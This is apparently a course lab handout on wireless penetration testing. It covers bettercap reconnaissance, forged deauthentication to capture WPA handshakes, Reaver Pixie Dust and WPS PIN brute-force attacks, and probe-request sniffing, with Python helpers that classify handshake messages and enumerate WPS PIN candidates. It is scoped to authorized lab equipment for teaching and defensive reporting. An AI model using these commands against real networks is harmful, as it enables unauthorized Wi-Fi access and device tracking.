
Lab 10: Wireless-Pentest Cross-Cut


Chapter: 10 (Week 12) Duration: 3 hr Substrate: Alfa NIC + HackRF (instructor lab) + sandboxed AP + authorized target client Points: 8


Overview

Apply the PT-track wireless-pentest toolchain (Reaver, Bettercap, passive probe collection) to an instructor-controlled sandboxed target. All active operations target only the instructor-assigned lab infrastructure.


Authorization

  • Target AP BSSID: __________________ (provided by instructor)
  • Target client MAC: __________________ (provided by instructor; instructor-controlled machine)
  • Lab is air-gapped (no internet-facing infrastructure in scope)
  • All transmit work inside RF-shielded enclosure or isolated frequency band

Part 1: Bettercap 802.11 Reconnaissance (45 min)

# Start bettercap with Alfa NIC in monitor mode
sudo bettercap -iface wlan0mon

# In bettercap REPL:
> wifi.recon on
# Wait 60 seconds for scan to populate
> wifi.show
# Output: BSSID, SSID, channel, RSSI, encryption type, WPS, clients

Record:

  1. What encryption type is the lab AP using? (WPA2/WPA3/Open)
  2. Is WPS listed as enabled? (Look for WPS column in wifi.show output)
  3. How many clients are associated with the lab AP?
  4. What is the RSSI of the lab AP?

BLE reconnaissance (bettercap's ble module uses the host's Bluetooth HCI adapter, hci0 by default, not the Alfa NIC; confirm the adapter is up with hciconfig before starting):

> ble.recon on
# Wait 30 seconds
> ble.show

Record: BLE devices visible, their addresses, names, and RSSI.


Part 2: Targeted Deauthentication (15 min; instructor authorization required)

Start the capture before sending any deauth so the reconnect is not missed, and lock both tools to the lab AP's channel: bettercap hops channels while wifi.recon is on, and a deauthentication frame sent on the wrong channel never reaches the client.

# Terminal 1: capture on the lab AP's channel (airodump-ng writes lab10-handshake-01.cap)
sudo airodump-ng wlan0mon --bssid <lab-AP-BSSID> -c <channel> --write lab10-handshake

# bettercap REPL: pin the channel, then target the instructor-controlled client only
> wifi.recon.channel <channel>
> wifi.deauth AA:BB:CC:DD:EE:FF   # instructor-provided client MAC

Monitor in Wireshark (second terminal, same monitor interface): the filter wlan.fc.type_subtype == 0x000c shows the forged deauthentication frames; check whether the client goes quiet and then sends a fresh Authentication and Association Request. A client that ignores the frames entirely may be using 802.11w (Management Frame Protection), which Part 5 asks you to assess.

When the client reconnects, airodump-ng shows "WPA handshake: <BSSID>" in its status line. What is captured is the WPA 4-way handshake (EAPOL-Key messages M1-M4, Wireshark filter eapol), not an EAP exchange.

Record: was the handshake complete (all four EAPOL-Key messages present)? Note that offline PSK cracking needs only M2 together with M1 or M3, so a capture with fewer than four messages may still be usable.
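Checking the capture by hand in Wireshark is fine for one client; the script below, added here as a worked example and not part of the original lab material, automates the two Part 2 questions against the airodump-ng file: how many deauthentication frames were aimed at the lab client, and which of the four EAPOL-Key messages were captured when it reconnected. It is a pure-Python pcap walker (no scapy) that reads the DLT 105 (raw 802.11) format airodump-ng writes and the DLT 127 (radiotap) format Wireshark saves from a monitor interface, and classifies each EAPOL-Key frame by its Key Information bits. The MAC addresses, build_sample_capture() and the frames it emits are constructed test data, not lab traffic; substitute the instructor-provided values when running it against lab10-handshake-01.cap.

```python
import struct

# EAPOL-Key Key Information bits (IEEE 802.11, 12.7.2)
KI_INSTALL, KI_ACK, KI_MIC, KI_SECURE = 0x0040, 0x0080, 0x0100, 0x0200
EAPOL_KEY_FIXED = 99                      # EAPOL header (4) + fixed EAPOL-Key fields (95)
LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"


def classify_eapol_key(eapol: bytes):
    """Return 1-4 for the 4-way handshake message number, or None if not an EAPOL-Key."""
    if len(eapol) < EAPOL_KEY_FIXED or eapol[1] != 3:   # EAPOL packet type 3 = Key
        return None
    key_info = struct.unpack(">H", eapol[5:7])[0]
    key_data_len = struct.unpack(">H", eapol[97:99])[0]
    ack, mic = key_info & KI_ACK, key_info & KI_MIC
    install, secure = key_info & KI_INSTALL, key_info & KI_SECURE
    if ack and not mic:
        return 1                                        # M1: AP -> STA, carries ANonce
    if ack and mic and install:
        return 3                                        # M3: AP -> STA, install PTK
    if mic and not ack and not install:
        # M2 carries the RSN IE in Key Data; M4 has Secure set and empty Key Data
        return 4 if (secure or key_data_len == 0) else 2
    return None


def iter_pcap(data: bytes):
    """Yield (linktype, frame) for every record of a classic pcap held in memory."""
    endian = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">"}[data[:4]]
    linktype = struct.unpack(endian + "I", data[20:24])[0]
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack(endian + "IIII", data[off:off + 16])[2]
        off += 16
        yield linktype, data[off:off + incl_len]
        off += incl_len


def parse_80211(linktype: int, frame: bytes):
    """Return (fc0, fc1, addr1, addr2, body) of an 802.11 frame, stripping radiotap."""
    if linktype == 127:                                  # LINKTYPE_IEEE802_11_RADIOTAP
        frame = frame[struct.unpack("<H", frame[2:4])[0]:]
    elif linktype != 105:                                # LINKTYPE_IEEE802_11 (airodump-ng)
        return None
    if len(frame) < 24:
        return None
    fc0, fc1, hdr = frame[0], frame[1], 24
    if fc0 & 0x0C == 0x08 and fc0 & 0x80:                # QoS Data: 2-byte QoS Control
        hdr += 2
    if fc1 & 0x03 == 0x03:                               # ToDS+FromDS: Address 4 present
        hdr += 6
    return fc0, fc1, frame[4:10], frame[10:16], frame[hdr:]


def analyse_capture(pcap: bytes, client_mac: str) -> dict:
    """Count deauths aimed at the client and collect the handshake messages it exchanged."""
    client = bytes.fromhex(client_mac.replace(":", ""))
    deauth, messages = 0, set()
    for linktype, frame in iter_pcap(pcap):
        parsed = parse_80211(linktype, frame)
        if parsed is None:
            continue
        fc0, _fc1, addr1, addr2, body = parsed
        if fc0 & 0xFC == 0xC0 and addr1 in (client, b"\xff" * 6):  # Deauthentication
            deauth += 1
        elif fc0 & 0x0C == 0x08 and client in (addr1, addr2) and body[:8] == LLC_SNAP_EAPOL:
            msg = classify_eapol_key(body[8:])           # Data frame carrying EAPOL
            if msg:
                messages.add(msg)
    return {"deauth_frames": deauth, "handshake_messages": sorted(messages),
            "complete": messages == {1, 2, 3, 4},
            # aircrack-ng/hashcat need M2 plus either M1 or M3; M3+M4 alone is not enough
            "crackable": {1, 2} <= messages or {2, 3} <= messages}


# ---- constructed sample capture (not real lab traffic); MACs are assumed values ----
LAB_AP, LAB_CLIENT = "02:00:00:00:aa:01", "02:00:00:00:cc:01"


def dot11_header(fc0, fc1, a1, a2, a3):
    return bytes([fc0, fc1, 0, 0]) + a1 + a2 + a3 + b"\x00\x00"


def eapol_key_frame(key_info, key_data=b""):
    body = (bytes([2]) + struct.pack(">HH", key_info, 16) + b"\x00" * 8 + b"\x11" * 32
            + b"\x00" * 48 + struct.pack(">H", len(key_data)) + key_data)
    return struct.pack(">BBH", 2, 3, len(body)) + body


def build_sample_capture(messages=(1, 2, 3, 4), deauths=3) -> bytes:
    """Forged deauths followed by a WPA2-CCMP 4-way handshake, written as a DLT 105 pcap."""
    ap, sta = (bytes.fromhex(m.replace(":", "")) for m in (LAB_AP, LAB_CLIENT))
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
    dn, up = dot11_header(0x08, 0x02, sta, ap, ap), dot11_header(0x08, 0x01, ap, sta, ap)
    hs = {1: dn + LLC_SNAP_EAPOL + eapol_key_frame(0x008A),            # Key Info as on air
          2: up + LLC_SNAP_EAPOL + eapol_key_frame(0x010A, rsn_ie),
          3: dn + LLC_SNAP_EAPOL + eapol_key_frame(0x13CA, b"\x00" * 56),
          4: up + LLC_SNAP_EAPOL + eapol_key_frame(0x030A)}
    records = [dot11_header(0xC0, 0x00, sta, ap, ap) + b"\x07\x00"] * deauths  # reason 7
    records += [hs[m] for m in messages]
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 105)]
    for i, rec in enumerate(records):
        out.append(struct.pack("<IIII", 1_700_000_000 + i, 0, len(rec), len(rec)) + rec)
    return b"".join(out)
```

Against the real file, call analyse_capture(open("lab10-handshake-01.cap", "rb").read(), "<client MAC>") and paste the returned dict into the deliverable. The crackable flag mirrors what aircrack-ng and hashcat accept: M2 plus M1 or M3, since M2 carries the client's MIC and SNonce and the ANonce comes from M1 or M3; a capture holding only M3 and M4 is not enough because M4's nonce field is normally zeroed in WPA2.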


Part 3: WPS Check + Reaver (30 min)

# Check for WPS-enabled APs in the lab environment (Lck column = AP has locked WPS)
wash -i wlan0mon -c <channel>

# If the lab AP has WPS enabled (instructor will confirm):
# Attempt Pixie Dust (-K 1). Reaver associates with the AP itself; only pass
# -A/--no-associate if aireplay-ng -1 is handling the association for it.
sudo reaver -i wlan0mon -b <lab-AP-BSSID> -c <channel> -vv -K 1

Expected outcomes:

WPS State                                     Expected Result
WPS enabled, vulnerable PRNG (Pixie Dust)     PIN recovered offline from a single M1-M3 exchange; rerun with -p <PIN> to extract the PSK
WPS enabled, locked after 3 failed attempts   wash shows Lck = Yes; reaver reports "WPS transaction failed" or AP rate limiting
WPS disabled                                  No WPS IE in beacons; wash lists no target
WPS with strong PRNG                          Pixie Dust fails (E-S1/E-S2 not recoverable); online PIN brute force needs at most 11,000 attempts

Two points on the last rows: a lockout stops an online PIN brute force but not Pixie Dust, which needs only one exchange to collect the hashes it cracks offline. The 11,000 bound (not ~20,000) comes from the AP verifying the PIN in two halves, 10,000 guesses for digits 1-4 and then 1,000 for digits 5-7, with digit 8 being a checksum rather than a free digit; the expected cost is roughly half the maximum.

Document which outcome you observe and why.
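The 11,000 figure in the table is worth deriving rather than memorising. The snippet below is an added example (not part of the lab material or of reaver itself) that computes the WPS PIN checksum digit with the same weighting reaver uses, enumerates the 1,000 full PINs that remain once the first half is confirmed, and returns the worst-case online guess count. The PIN 12345670 is a widely published default and is used here only as a check value.

```python
def wps_pin_checksum(first_seven: int) -> int:
    """Checksum (8th) digit of a WPS PIN from its first seven digits.

    Digits 1, 3, 5 and 7 are weighted 3, digits 2, 4 and 6 are weighted 1,
    and the checksum makes the weighted sum a multiple of 10.
    """
    accum, n = 0, first_seven
    while n:
        accum += 3 * (n % 10)       # digits 7, 5, 3, 1 (consumed from the right)
        n //= 10
        accum += n % 10             # digits 6, 4, 2
        n //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if pin is 8 digits whose last digit is the checksum of the first seven."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_pin_checksum(int(pin[:7]))


def candidate_pins(first_half: int):
    """The 1,000 full PINs left once digits 1-4 are confirmed by the M4 NACK oracle."""
    for second_half in range(1000):
        seven = first_half * 1000 + second_half
        yield f"{seven:07d}{wps_pin_checksum(seven)}"


def online_bruteforce_bound() -> int:
    """Worst case: 10,000 first-half guesses (M4), then every second-half candidate (M6)."""
    return 10 ** 4 + sum(1 for _ in candidate_pins(0))
```

The bound holds because the registrar protocol leaks the result per half: a wrong first half is rejected at M4 and a wrong second half at M6, so the halves are searched independently, and digit 8 never has to be guessed. If the AP had to be asked about each whole PIN instead, the space would be 10^7 valid PINs.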


Part 4: Probe Request Passive Collection (30 min)

Run the passive probe-collection script from Week 12 lecture for 10 minutes:

from scapy.all import sniff
from scapy.layers.dot11 import Dot11ProbeReq, Dot11Elt
from collections import defaultdict
import time

probes = defaultdict(set)   # client MAC -> set of SSIDs it probed for
start = time.time()

def handle(pkt):
    if not (pkt.haslayer(Dot11ProbeReq) and pkt.haslayer(Dot11Elt)):
        return
    elt = pkt[Dot11Elt]
    if elt.ID != 0:           # element ID 0 is the SSID; anything else is not the name
        return
    src = pkt.addr2           # transmitter address of the probing client
    ssid = elt.info.decode('utf-8', errors='replace').strip()
    if ssid:                  # empty SSID = wildcard (broadcast) probe, reveals nothing
        probes[src].add(ssid)

sniff(iface="wlan0mon", prn=handle, store=0, timeout=600)

print(f"\nProbe requests collected over {time.time()-start:.0f}s:")
for mac, ssids in sorted(probes.items()):
    # bit 1 of the first octet set = locally administered, i.e. a randomised MAC
    addr_type = "random" if int(mac.split(':')[0], 16) & 0x02 else "public"
    print(f"  {mac} ({addr_type}): {sorted(ssids)[:5]}")

Analysis:

  1. How many unique MAC addresses sent probe requests?
  2. Of these, how many are randomised MACs (locally administered bit set)?
  3. What SSIDs are being probed for? Do any reveal previous locations (coffee-shop chains, hotel networks, corporate SSIDs)?
  4. For any device probing for a specific SSID: what would an evil-twin attack look like against this device?

Part 5: Pentest Methodology Note (30 min)

Write a 1-page pentest methodology note covering the findings from this lab, as if writing a brief section of a wireless engagement report:

Required sections:

  1. Finding: WPS Status (1 paragraph): What WPS state did you observe? What is the risk rating (Critical/High/Medium/Low/Informational)? What is the remediation?

  2. Finding: Deauthentication Attack Surface (1 paragraph): Does the AP advertise 802.11w (MFP)? Check the RSN Capabilities field of the beacon's RSN IE in Wireshark (MFPC/MFPR bits) and whether the client ignored the forged frames in Part 2. What is the deauth-flood risk? What is the remediation?

  3. Finding: Probe Request PNL Leakage (1 paragraph): What does probe-request observation reveal about client devices? What privacy implications does this have? What is the remediation?


Deliverables

  • Bettercap wifi.show output (screenshot or text)
  • WPS check (wash output) + Reaver result
  • Deauth experiment result (was handshake captured? was client deauthed?)
  • Probe-request collection output (Python script output, anonymised if needed)
  • 1-page pentest methodology note (three findings)

Grading (8 points)

Item                                                              Points
Bettercap recon output with AP/client info                        1.5
WPS assessment + Reaver attempt documentation                     2
Probe-request analysis (uniqueness + SSID list)                   1.5
Pentest methodology note (three findings, correct risk ratings)   3